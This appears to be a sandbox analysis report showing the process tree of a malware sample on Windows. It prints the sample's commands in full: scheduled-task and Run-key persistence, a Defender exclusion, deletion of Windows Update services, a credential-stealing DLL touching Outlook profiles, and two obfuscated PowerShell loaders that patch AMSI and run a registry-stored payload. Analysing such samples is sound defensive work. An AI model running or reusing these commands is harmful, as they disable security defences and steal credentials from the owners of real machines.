C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"C:\Users\Admin\AppData\Local\Temp\7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe" /F6⤵
- Creates scheduled task(s)
PID:4228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\acc0b83959" /P "Admin:N"&&CACLS "..\acc0b83959" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2644
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"7⤵PID:5024
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E7⤵PID:5012
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4892
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\acc0b83959" /P "Admin:N"7⤵PID:4976
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\acc0b83959" /P "Admin:R" /E7⤵PID:1064
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000003062\syncfiles.dll, rundll7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5108 -
C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\avicapn32.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\cmd.execmd.exe /C schtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f7⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f8⤵
- Creates scheduled task(s)
PID:4636 -
C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3632 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
PID:3956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gkucwdcha#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvndrivesllapi' /tr '''C:\Users\Admin\PLocktime\nvndrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvndrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvndrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4560 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2712 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4920 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2564 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3612 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1936 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2324
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3712
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2344 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4636
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4788
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2160
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"2⤵PID:4828
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xtjjcgktv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvndrivesllapi" } Else { "C:\Users\Admin\PLocktime\nvndrivesllapi.exe" }2⤵PID:3960
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn nvndrivesllapi3⤵PID:1324
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3728
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3728 -s 9002⤵
- Program crash
PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:4184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4304
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4392
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4392 -s 7802⤵
- Program crash
PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4252
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3524
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2620
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2176
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1644
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1480
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1388
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1284
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1276
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1176
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1112
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exeC:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4604 -
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 12483⤵
- Program crash
PID:4232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZdhPEYoflqcd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VLfbcfNHCDtmuR,[Parameter(Position=1)][Type]$uwUVjzOmfV)$DITKHSVxZCI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+'ga'+'t'+''+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DITKHSVxZCI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+'Nam'+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VLfbcfNHCDtmuR).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e,'+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+'ed');$DITKHSVxZCI.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+'l'+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$uwUVjzOmfV,$VLfbcfNHCDtmuR).SetImplementationFlags(''+'R'+'un'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $DITKHSVxZCI.CreateType();}$aSicYtFBkgxUm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+'nsa'+[Char](102)+''+[Char](101)+''+[Char](97)+''+[Char](83)+''+[Char](105)+''+[Char](99)+''+[Char](89)+''+[Char](116)+''+[Char](70)+''+'B'+''+[Char](107)+''+[Char](103)+''+[Char](120)+''+'U'+''+'m'+'');$bFzVnGZjWDzqhJ=$aSicYtFBkgxUm.GetMethod(''+[Char](98)+''+[Char](70)+'z'+[Char](86)+''+[Char](110)+'G'+[Char](90)+''+[Char](106)+''+'W'+''+[Char](68)+''+[Char](122)+''+[Char](113)+'h'+'J'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tskFyZtaUuAObHUJZdb=ZdhPEYoflqcd @([String])([IntPtr]);$luBWublazzLOQDBjXrmdow=ZdhPEYoflqcd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ypxibQaSjud=$aSicYtFBkgxUm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$tPOIokMJfiSkLH=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$ypxibQaSjud,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+'A')));$NNLJUjhtlKcGkSWAX=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$ypxibQaSjud,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$kxiFgQW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tPOIokMJfiSkLH,$tskFyZtaUuAObHUJZdb).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$jVjODYWauBcwDwvei=$bFzVnGZjWDzqhJ.Invoke($Null,@([Object]$kxiFgQW,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+'canBu'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$ROgXNsZTnz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NNLJUjhtlKcGkSWAX,$luBWublazzLOQDBjXrmdow).Invoke($jVjODYWauBcwDwvei,[uint32]8,4,[ref]$ROgXNsZTnz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jVjODYWauBcwDwvei,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NNLJUjhtlKcGkSWAX,$luBWublazzLOQDBjXrmdow).Invoke($jVjODYWauBcwDwvei,[uint32]8,0x20,[ref]$ROgXNsZTnz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+'ler'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PbqyqEBGqpoW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xQMlShcwNnhCbr,[Parameter(Position=1)][Type]$WXGfhIfcut)$ncnDXmHlRTd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ncnDXmHlRTd.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xQMlShcwNnhCbr).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$ncnDXmHlRTd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'H'+''+'i'+''+'d'+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$WXGfhIfcut,$xQMlShcwNnhCbr).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+'i'+'m'+'e'+''+','+''+'M'+''+[Char](97)+'nag'+'e'+''+[Char](100)+'');Write-Output $ncnDXmHlRTd.CreateType();}$FTHemIQwZLJQH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'em.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('Mic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](70)+''+[Char](84)+''+[Char](72)+''+[Char](101)+'m'+'I'+''+[Char](81)+''+[Char](119)+'ZL'+[Char](74)+'Q'+[Char](72)+'');$LulXAPrPoYZJma=$FTHemIQwZLJQH.GetMethod(''+[Char](76)+''+[Char](117)+''+[Char](108)+''+'X'+''+[Char](65)+''+[Char](80)+''+[Char](114)+''+'P'+''+[Char](111)+''+[Char](89)+''+'Z'+'J'+[Char](109)+''+[Char](97)+'',[Reflection.BindingFlags]'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eMinDXQnorpKkZYpBrs=PbqyqEBGqpoW @([String])([IntPtr]);$lRWQjFvYVCetyICpHrpHLx=PbqyqEBGqpoW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cthcTjNmmJI=$FTHemIQwZLJQH.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$PjIliYJsSzdCgv=$LulXAPrPoYZJma.Invoke($Null,@([Object]$cthcTjNmmJI,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+'b'+'rary'+'A'+'')));$zlmLaPvMjSYnSPyCw=$LulXAPrPoYZJma.Invoke($Null,@([Object]$cthcTjNmmJI,[Object](''+'V'+'i'+[Char](114)+'tu'+'a'+''+'l'+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$JTwPSqb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PjIliYJsSzdCgv,$eMinDXQnorpKkZYpBrs).Invoke(''+'a'+''+'m'+''+'s'+'i.d'+[Char](108)+''+[Char](108)+'');$iXbMViEfVuGBPRgdx=$LulXAPrPoYZJma.Invoke($Null,@([Object]$JTwPSqb,[Object](''+[Char](65)+''+'m'+''+'s'+'i'+[Char](83)+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$swxoAmigoR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zlmLaPvMjSYnSPyCw,$lRWQjFvYVCetyICpHrpHLx).Invoke($iXbMViEfVuGBPRgdx,[uint32]8,4,[ref]$swxoAmigoR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iXbMViEfVuGBPRgdx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zlmLaPvMjSYnSPyCw,$lRWQjFvYVCetyICpHrpHLx).Invoke($iXbMViEfVuGBPRgdx,[uint32]8,0x20,[ref]$swxoAmigoR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:4620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4236
-
C:\Users\Admin\PLocktime\nvndrivesllapi.exeC:\Users\Admin\PLocktime\nvndrivesllapi.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3856
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:784
-
